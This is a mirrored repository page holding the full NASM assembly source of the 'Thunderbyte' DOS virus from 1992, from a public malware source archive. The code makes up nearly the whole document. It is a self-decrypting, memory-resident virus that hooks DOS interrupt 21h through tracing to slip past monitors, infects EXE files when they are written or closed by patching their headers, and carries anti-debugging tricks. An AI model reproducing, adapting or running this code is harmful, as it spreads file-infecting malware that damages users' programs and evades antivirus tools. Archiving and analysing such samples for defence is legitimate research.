mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-05 09:55:27 +00:00
613 lines
10 KiB
NASM
613 lines
10 KiB
NASM
;*****************************************************************************;
|
||
; ;
|
||
; Tunderbyte Virus ;
|
||
; ;
|
||
; TBSCAN.DAT : DB3F00807609??4D75F9 ;
|
||
; ;
|
||
;*****************************************************************************;
|
||
|
||
virus segment public 'code'
|
||
assume cs:virus, ds:virus, es:virus
|
||
org 0
|
||
|
||
VirusStart equ $
|
||
VirusSize1 equ (VirusEnd1-$)
|
||
VirusSize2 equ (VirusEnd2-$)
|
||
|
||
Decrypt1: db 0bdh,StartEncrypt-Decrypt2,0
|
||
db 80h,76h,Decrypt2-VirusStart-1,0
|
||
db 4dh,75h,-7
|
||
Decrypt2: cli
|
||
mov sp,offset DoAgain-2
|
||
ret -8
|
||
|
||
db 0,0,0,0,'***** THUNDERBYTE *****',0,0,0,0
|
||
|
||
Init: mov cx,(VirusEnd1-StartEncrypt+1)/2
|
||
mov dl,byte ptr cs:Decrypt1[6]
|
||
mov dh,dl
|
||
mov si,offset StartEncrypt
|
||
NotReady: ret 2
|
||
|
||
DecryptWord: mov ax,ss:[si]
|
||
xor cs:[si],dx
|
||
NextWord: add dx,ax
|
||
inc si
|
||
ret -4
|
||
|
||
dw DecryptWord
|
||
dw DoAgain
|
||
dw NextWord
|
||
dw Init
|
||
DoAgain: loop NotReady
|
||
|
||
StartEncrypt equ $
|
||
|
||
Main: mov sp,1000h
|
||
sti
|
||
push ds
|
||
push es
|
||
mov ax,03031h
|
||
mov bx,0DEADh
|
||
int 21h
|
||
cmp ax,0DEADh
|
||
jne Install
|
||
jmp Exit
|
||
Install: push es
|
||
mov ah,52h
|
||
int 21h
|
||
mov ax,es:[bx-2]
|
||
mov cs:FirstMCB,ax
|
||
pop es
|
||
CheckBlock: mov ds,ax
|
||
inc ax
|
||
cmp word ptr ds:[1],ax
|
||
jne NextBlock
|
||
cmp word ptr ds:[3],((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)
|
||
jne NextBlock
|
||
push ax
|
||
push es
|
||
mov cx,VirusSize2
|
||
xor di,di
|
||
mov es,ax
|
||
mov al,es:[di]
|
||
cld
|
||
repe scasb
|
||
pop es
|
||
pop ax
|
||
je CopyVirus
|
||
NextBlock: add ax,ds:[3]
|
||
cmp byte ptr ds:[0],'Z'
|
||
jne CheckBlock
|
||
mov ah,4ah
|
||
mov bx,-1
|
||
int 21h
|
||
mov ah,4ah
|
||
sub bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)+1
|
||
int 21h
|
||
mov ah,48h
|
||
mov bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)
|
||
int 21h
|
||
CopyVirus: push cs
|
||
pop ds
|
||
dec ax
|
||
mov es,ax
|
||
inc ax
|
||
mov es:[1],ax
|
||
mov cx,8
|
||
mov si,offset CommandStr
|
||
mov di,cx
|
||
cld
|
||
rep movsb
|
||
mov es,ax
|
||
EncryptZero: inc byte ptr ds:Decrypt1[6]
|
||
jz EncryptZero
|
||
mov cx,VirusSize2
|
||
xor si,si
|
||
xor di,di
|
||
cld
|
||
rep movsb
|
||
push es
|
||
call ReturnFar
|
||
xor ax,ax
|
||
mov ds,ax
|
||
cli
|
||
mov ax,offset DebugWatch
|
||
xchg ax,ds:[20h]
|
||
mov cs:OldInt8o,ax
|
||
mov ax,cs
|
||
xchg ax,ds:[22h]
|
||
mov cs:OldInt8s,ax
|
||
sti
|
||
push ds:[4]
|
||
push ds:[6]
|
||
mov word ptr ds:[4],offset Trace1
|
||
mov word ptr ds:[6],cs
|
||
pushf
|
||
push cs
|
||
mov ax,offset Return4
|
||
push ax
|
||
cli
|
||
pushf
|
||
pop ax
|
||
or ax,100h
|
||
push ax
|
||
push ds:[86h]
|
||
push ds:[84h]
|
||
mov ah,52h
|
||
Trace1: push bp
|
||
mov bp,sp
|
||
push ax
|
||
push ds
|
||
push cs
|
||
pop ds
|
||
mov ax,FirstMCB
|
||
cmp [bp+4],ax
|
||
jae Return1
|
||
mov ax,[bp-2]
|
||
mov RegAX,ax
|
||
mov RegSP,bp
|
||
mov ax,[bp+2]
|
||
mov OldInt21o,ax
|
||
mov ax,[bp+4]
|
||
mov OldInt21s,ax
|
||
xor ax,ax
|
||
mov ds,ax
|
||
mov word ptr ds:[4],offset Trace2
|
||
mov word ptr ds:[6],cs
|
||
jmp short Trace3
|
||
Return1: jmp short Return3
|
||
Trace2: push bp
|
||
mov bp,sp
|
||
push ax
|
||
push ds
|
||
cmp ax,cs:RegAX
|
||
jne Return3
|
||
cmp bp,cs:RegSP
|
||
jne Return3
|
||
Trace3: push bx
|
||
push dx
|
||
lds bx,[bp+2]
|
||
mov al,[bx]
|
||
mov dx,[bx+1]
|
||
inc dx
|
||
cmp al,0e9h
|
||
je JumpOpcode
|
||
cmp al,0e8h
|
||
je CallOpcode
|
||
xchg ax,dx
|
||
dec ax
|
||
cbw
|
||
xchg ax,dx
|
||
cmp al,0ebh
|
||
je JumpOpcode
|
||
cmp al,70h
|
||
jb Return2
|
||
cmp al,7fh
|
||
ja Return2
|
||
JumpOpcode: push ax
|
||
push ds
|
||
xor ax,ax
|
||
mov ds,ax
|
||
mov word ptr ds:[0c8h],offset HackJump
|
||
mov word ptr ds:[0cah],cs
|
||
jmp short Continue
|
||
CallOpcode: push ax
|
||
push ds
|
||
xor ax,ax
|
||
mov ds,ax
|
||
mov word ptr ds:[0c8h],offset HackCall
|
||
mov word ptr ds:[0cah],cs
|
||
Continue: pop ds
|
||
pop ax
|
||
mov cs:Displacement,dx
|
||
mov cs:Opcode,al
|
||
mov ax,32cdh
|
||
xchg ax,[bx]
|
||
mov cs:SavedCode,ax
|
||
mov cs:HackOffset,bx
|
||
mov cs:HackSegment,ds
|
||
and word ptr [bp+6],0feffh
|
||
Return2: pop dx
|
||
pop bx
|
||
Return3: pop ds
|
||
pop ax
|
||
pop bp
|
||
iret
|
||
Return4: pop ds:[6]
|
||
pop ds:[4]
|
||
mov cs:Handle,0
|
||
Exit: pop es
|
||
pop ds
|
||
mov ax,ds
|
||
add ax,10h
|
||
add cs:OldCS,ax
|
||
add ax,cs:OldSP
|
||
mov dx,cs:OldSP
|
||
cli
|
||
mov ss,ax
|
||
mov sp,dx
|
||
sti
|
||
jmp cs:OldEntry
|
||
|
||
ReturnFar: retf
|
||
|
||
OldEntry equ this dword
|
||
OldIP dw 0
|
||
OldCS dw -10h
|
||
OldSP dw 1000h
|
||
OldSS dw 0
|
||
|
||
HackAddress equ this dword
|
||
HackOffset dw ?
|
||
HackSegment dw ?
|
||
SavedCode dw ?
|
||
|
||
HackJump: call Interrupt21
|
||
push bp ; simulate a conditional or
|
||
push ax ; unconditional jump
|
||
mov bp,sp
|
||
mov ax,[bp+8]
|
||
and ax,0fcffh
|
||
push ax
|
||
db 0b8h ; mov ax,????
|
||
Displacement dw 0
|
||
popf
|
||
Opcode db 0ebh,3,0 ; j?? +3
|
||
xor ax,ax
|
||
nop
|
||
add [bp+4],ax
|
||
pop ax
|
||
pop bp
|
||
iret
|
||
|
||
HackCall: call Interrupt21
|
||
sub sp,2 ; simulate a call
|
||
push bp
|
||
mov bp,sp
|
||
push ax
|
||
mov ax,[bp+4]
|
||
inc ax
|
||
xchg ax,[bp+8]
|
||
xchg ax,[bp+6]
|
||
xchg ax,[bp+4]
|
||
add ax,cs:Displacement
|
||
mov [bp+2],ax
|
||
pop ax
|
||
pop bp
|
||
iret
|
||
|
||
Seek: mov ah,42h
|
||
xor cx,cx
|
||
xor dx,dx
|
||
|
||
Dos: pushf
|
||
db 9ah
|
||
OldInt21o dw ?
|
||
OldInt21s dw ?
|
||
ret
|
||
|
||
DosVersion: cmp ax,3031h
|
||
jne NotTByte
|
||
cmp bx,0DEADh
|
||
jne NotTByte
|
||
mov ax,0DEADh
|
||
add sp,8
|
||
iret
|
||
|
||
Interrupt21: cmp ah,30h
|
||
je DosVersion
|
||
push si
|
||
push ds
|
||
push cs:SavedCode
|
||
lds si,cs:HackAddress
|
||
pop ds:[si]
|
||
pop ds
|
||
pop si
|
||
push ax
|
||
push bx
|
||
push cx
|
||
push dx
|
||
push si
|
||
push di
|
||
push bp
|
||
push ds
|
||
push es
|
||
cmp ah,3eh
|
||
je CloseFile
|
||
cmp ah,40h
|
||
je WriteFile
|
||
Old21: pop es
|
||
pop ds
|
||
pop bp
|
||
pop di
|
||
pop si
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
push si
|
||
push ds
|
||
lds si,cs:HackAddress
|
||
mov word ptr ds:[si],32cdh
|
||
pop ds
|
||
pop si
|
||
NotTByte: ret
|
||
|
||
WriteFile: mov ax,4400h
|
||
call Dos
|
||
cmp dl,7fh
|
||
ja Error1
|
||
mov al,1
|
||
call Seek
|
||
jc Error1
|
||
or dx,dx
|
||
jnz Error1
|
||
cmp ax,17h
|
||
ja Error1
|
||
push cs
|
||
pop es
|
||
mov si,dx
|
||
mov di,offset Signature
|
||
add di,ax
|
||
cmp word ptr [si],"ZM"
|
||
jne Error1
|
||
cmp word ptr [si+12h],0DEADh
|
||
je Error1
|
||
cmp cx,18h
|
||
jb CheckHandle
|
||
or ax,ax
|
||
jz Ok
|
||
CheckHandle: cmp bx,cs:Handle
|
||
jne Error1
|
||
Ok: add cx,ax
|
||
cmp cx,18h
|
||
jbe CountOk
|
||
mov cx,18h
|
||
CountOk: sub cx,ax
|
||
jbe Error1
|
||
cld
|
||
rep movsb
|
||
mov cs:Handle,bx
|
||
Error1: jmp Old21
|
||
|
||
CloseFile: push cs
|
||
pop ds
|
||
push cs
|
||
pop es
|
||
mov ax,4400h
|
||
call Dos
|
||
test dl,80h
|
||
jne Error1
|
||
or bx,bx
|
||
je Read
|
||
cmp cs:Handle,bx
|
||
je DoNotRead
|
||
Read: xor al,al
|
||
call Seek
|
||
jc Error1
|
||
mov ah,3fh
|
||
mov cx,18h
|
||
mov dx,offset Signature
|
||
call Dos
|
||
jc Error1
|
||
DoNotRead: mov cs:Handle,0
|
||
cmp Signature,"ZM"
|
||
jne Error1
|
||
cmp ChkSum,0DEADh
|
||
je Error1
|
||
mov ax,ExeIP
|
||
mov OldIP,ax
|
||
mov ax,ExeCS
|
||
mov OldCS,ax
|
||
mov ax,ExeSS
|
||
mov OldSS,ax
|
||
mov ax,ExeSP
|
||
mov OldSP,ax
|
||
mov al,2
|
||
call Seek
|
||
jc Error1
|
||
push ax
|
||
push dx
|
||
mov cx,200h
|
||
div cx
|
||
cmp PartPage,dx
|
||
jne SizeError
|
||
add dx,-1
|
||
adc ax,0
|
||
cmp PageCount,ax
|
||
SizeError: pop dx
|
||
pop ax
|
||
jne Error2
|
||
add ax,0fh
|
||
adc dx,0
|
||
and ax,0fff0h
|
||
mov cx,dx
|
||
mov dx,ax
|
||
mov ax,4200h
|
||
call Dos
|
||
jnc SeekOk
|
||
Error2: jmp Old21
|
||
SeekOk: mov cx,10h
|
||
div cx
|
||
sub ax,HdrSize
|
||
mov ExeCS,ax
|
||
mov ExeIP,offset Decrypt1
|
||
mov ExeSS,ax
|
||
mov ExeSP,VirusSize1+400h
|
||
cmp MinMem,40h
|
||
jae MemoryOk
|
||
mov MinMem,40h
|
||
cmp MaxMem,40h
|
||
jae MemoryOk
|
||
mov MaxMem,40h
|
||
MemoryOk: push ds
|
||
push es
|
||
mov ax,cs
|
||
mov ds,ax
|
||
add ax,(VirusSize2+0fh)/10h
|
||
mov es,ax
|
||
mov cx,VirusSize1
|
||
xor si,si
|
||
xor di,di
|
||
cld
|
||
rep movsb
|
||
mov ds,ax
|
||
mov cx,offset StartEncrypt-Decrypt2
|
||
mov dl,byte ptr ds:Decrypt1[6]
|
||
mov si,offset StartEncrypt-1
|
||
Again1: xor ds:[si],dl
|
||
dec si
|
||
loop Again1
|
||
mov cx,(VirusEnd1-StartEncrypt+1)/2
|
||
mov dh,dl
|
||
mov si,offset StartEncrypt
|
||
Again2: xor ds:[si],dx
|
||
mov ax,ds:[si]
|
||
add dx,ax
|
||
inc si
|
||
add dx,ax
|
||
inc si
|
||
loop Again2
|
||
mov ah,40h
|
||
mov cx,VirusSize1
|
||
xor dx,dx
|
||
call Dos
|
||
pop ds
|
||
pop es
|
||
jc Error3
|
||
mov al,2
|
||
call Seek
|
||
jc Error3
|
||
mov cx,200h
|
||
div cx
|
||
mov PartPage,dx
|
||
add dx,-1
|
||
adc ax,0
|
||
mov PageCount,ax
|
||
mov ChkSum,0DEADh
|
||
xor al,al
|
||
call Seek
|
||
jc Error3
|
||
mov ah,40h
|
||
mov cx,18h
|
||
mov dx,offset Signature
|
||
call Dos
|
||
Error3: jmp Old21
|
||
|
||
Count dw 8
|
||
DebugStr db 'DEBUG'
|
||
CommandStr db 'COMMAND '
|
||
|
||
DebugWatch: push ax
|
||
push cx
|
||
push dx
|
||
push si
|
||
push di
|
||
push ds
|
||
push es
|
||
dec cs:Count
|
||
jnz EndWatch
|
||
mov cs:Count,8
|
||
mov ax,0b000h
|
||
mov ds,ax
|
||
mov cx,2
|
||
push cs
|
||
pop es
|
||
cld
|
||
NextScreen: push cx
|
||
mov cx,2000
|
||
xor si,si
|
||
mov di,offset DebugStr
|
||
NextChar1: mov dx,5
|
||
NextChar2: lodsb
|
||
inc si
|
||
and al,0dfh
|
||
scasb
|
||
jne CharOk
|
||
dec dx
|
||
jnz NextChar2
|
||
Alarm: pop cx
|
||
lds si,cs:HackAddress
|
||
cmp byte ptr ds:[si],0cdh
|
||
jne EndWatch
|
||
mov ax,cs:SavedCode
|
||
mov ds:[si],ax
|
||
xor cx,cx
|
||
mov ds,cx
|
||
mov ax,cs:OldInt8o
|
||
mov ds:[20h],ax
|
||
mov ax,cs:OldInt8s
|
||
mov ds:[22h],ax
|
||
mov es,cx
|
||
push cs
|
||
pop ds
|
||
mov cx,14
|
||
mov si,offset EndWatch-2
|
||
mov di,4f0h
|
||
push es
|
||
push di
|
||
rep movsb
|
||
xor di,di
|
||
mov cx,VirusSize2
|
||
push cs
|
||
pop es
|
||
retf
|
||
CharOk: neg dx
|
||
add dx,5
|
||
sbb di,dx
|
||
sub si,dx
|
||
sub si,dx
|
||
loop NextChar1
|
||
ScreenOk: mov ax,ds
|
||
add ax,800h
|
||
mov ds,ax
|
||
pop cx
|
||
loop NextScreen
|
||
jmp short EndWatch
|
||
rep stosb
|
||
EndWatch: pop es
|
||
pop ds
|
||
pop di
|
||
pop si
|
||
pop dx
|
||
pop cx
|
||
pop ax
|
||
db 0eah
|
||
OldInt8o dw ?
|
||
OldInt8s dw ?
|
||
|
||
db '***** (C) COPYRIGHT 1992 BY THE WRITER *****'
|
||
|
||
VirusEnd1 equ $
|
||
|
||
FirstMCB dw ?
|
||
RegAX dw ?
|
||
RegSP dw ?
|
||
|
||
Handle dw ?
|
||
Signature dw ?
|
||
PartPage dw ?
|
||
PageCount dw ?
|
||
ReloCnt dw ?
|
||
HdrSize dw ?
|
||
MinMem dw ?
|
||
MaxMem dw ?
|
||
ExeSS dw ?
|
||
ExeSP dw ?
|
||
ChkSum dw ?
|
||
ExeIP dw ?
|
||
ExeCS dw ?
|
||
|
||
VirusEnd2 equ $
|
||
|
||
virus ends
|
||
|
||
end Main
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
|